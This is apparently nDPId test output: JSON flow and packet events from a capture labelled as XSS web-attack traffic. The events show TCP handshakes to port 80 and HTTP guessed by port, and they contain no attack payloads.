-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347659123,"flow_last_seen":1499347659123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347659123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":1,"flow_last_seen":1499347659123,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347659123,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8x6pAAD4G\/iWsEAABwKgKMuikAFB+qkyDAAAAAKACchAefQAAAgQFtAQCCAoBO4spAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":2,"flow_last_seen":1499347659123,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347659123,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6KSKjQS\/fqpMhKAScSAvjAAAAgQFtAQCCAoD5VyeATuLKQEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5792,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_packet_id":3,"flow_last_seen":1499347659124,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347659124,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0x6tAAD4G\/iysEAABwKgKMuikAFB+qkyEio0EwIAQAOXOkwAAAQEICgE7iykD5Vye"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347660441,"flow_last_seen":1499347660441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347660441,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":1,"flow_last_seen":1499347660441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347660441,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SJ9AAD4GfTGsEAABwKgKMuiyAFDQzcTuAAAAAKACchBSmAAAAgQFtAQCCAoBO4xxAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":2,"flow_last_seen":1499347660441,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347660441,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6LJiYdyB0M3E76AScSCyxwAAAgQFtAQCCAoD5V3nATuMcQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_packet_id":3,"flow_last_seen":1499347660448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347660448,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SKBAAD4GfTisEAABwKgKMuiyAFDQzcTvYmHcgoAQAOVRzQAAAQEICgE7jHMD5V3n"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347661705,"flow_last_seen":1499347661705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347661705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":1,"flow_last_seen":1499347661705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347661705,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iZ5AAD4GPDKsEAABwKgKMujAAFBNGwQwAAAAAKACchCVvgAAAgQFtAQCCAoBO42uAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5815,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":2,"flow_last_seen":1499347661705,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347661705,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6MCaW9JGTRsEMaAScSDG8gAAAgQFtAQCCAoD5V8jATuNrgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5817,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_packet_id":3,"flow_last_seen":1499347661709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347661709,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iZ9AAD4GPDmsEAABwKgKMujAAFBNGwQxmlvSR4AQAOVl+QAAAQEICgE7ja8D5V8j"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347664226,"flow_last_seen":1499347664226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347664226,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":1,"flow_last_seen":1499347664226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347664226,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ye5AAD4GY+KsEAABwKgKMujaAFDKDfHLAAAAAKACchAonwAAAgQFtAQCCAoBO5AlAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":2,"flow_last_seen":1499347664227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347664227,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6NqT+P5Dyg3xzKAScSAxwgAAAgQFtAQCCAoD5WGaATuQJQEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_packet_id":3,"flow_last_seen":1499347664227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347664227,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ye9AAD4GY+msEAABwKgKMujaAFDKDfHMk\/j+RIAQAOXQyQAAAQEICgE7kCUD5WGa"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347665473,"flow_last_seen":1499347665473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347665473,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1499347665473,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347665473,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8f9VAAD4GRfusEAABwKgKMujoAFDrVO6JAAAAAKACchAJVQAAAgQFtAQCCAoBO5FcAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":2,"flow_last_seen":1499347665473,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347665473,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6OhBKwT561TuiqAScSBdWQAAAgQFtAQCCAoD5WLRATuRXAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":3,"flow_last_seen":1499347665474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347665474,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0f9ZAAD4GRgKsEAABwKgKMujoAFDrVO6KQSsE+oAQAOX8XwAAAQEICgE7kV0D5WLR"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347668069,"flow_last_seen":1499347668069,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668069,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1499347668069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347668069,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TE1AAD4GeYOsEAABwKgKMukCAFANB9+oAAAAAKACchDz4AAAAgQFtAQCCAoBO5PlAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5865,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":2,"flow_last_seen":1499347668069,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347668069,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6QI2lo7HDQffqaAScSDGIgAAAgQFtAQCCAoD5WVaATuT5QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5866,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":3,"flow_last_seen":1499347668070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347668070,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TE5AAD4GeYqsEAABwKgKMukCAFANB9+pNpaOyIAQAOVlKQAAAQEICgE7k+YD5WVa"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347535081,"flow_last_seen":1499347540761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347535081,"flow_last_seen":1499347540761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347536332,"flow_last_seen":1499347541761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347536332,"flow_last_seen":1499347541761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347537591,"flow_last_seen":1499347542762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347537591,"flow_last_seen":1499347542762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347540145,"flow_last_seen":1499347545763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347540145,"flow_last_seen":1499347545763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347541398,"flow_last_seen":1499347546763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347541398,"flow_last_seen":1499347546763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347542648,"flow_last_seen":1499347547763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347542648,"flow_last_seen":1499347547763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347668074,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347669336,"flow_last_seen":1499347669336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347669336,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1499347669336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347669336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XbZAAD4GaBqsEAABwKgKMukQAFClPsiUAAAAAKACchBxcgAAAgQFtAQCCAoBO5UiAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5874,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":2,"flow_last_seen":1499347669336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347669336,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6RAzOJpLpT7IlaAScSA6UQAAAgQFtAQCCAoD5WaXATuVIgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":3,"flow_last_seen":1499347669337,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347669337,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XbdAAD4GaCGsEAABwKgKMukQAFClPsiVMziaTIAQAOXZWAAAAQEICgE7lSID5WaX"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347670582,"flow_last_seen":1499347670582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347670582,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1499347670582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347670582,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Rc1AAD4GgAOsEAABwKgKMukeAFDr3NOXAAAAAKACchAeiwAAAgQFtAQCCAoBO5ZaAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5887,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":2,"flow_last_seen":1499347670582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347670582,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6R5lF6M+69zTmKAScSCrXwAAAgQFtAQCCAoD5WfPATuWWgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5888,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":3,"flow_last_seen":1499347670583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347670583,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Rc5AAD4GgAqsEAABwKgKMukeAFDr3NOYZRejP4AQAOVKZwAAAQEICgE7lloD5WfP"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347673136,"flow_last_seen":1499347673136,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347673136,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1499347673136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347673136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89tVAAD4GzvqsEAABwKgKMuk4AFAtrG4NAAAAAKACchA\/rgAAAgQFtAQCCAoBO5jYAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5905,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":2,"flow_last_seen":1499347673136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347673136,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6ThuKc6nLaxuDqAScSCViQAAAgQFtAQCCAoD5WpNATuY2AEDAwc="} 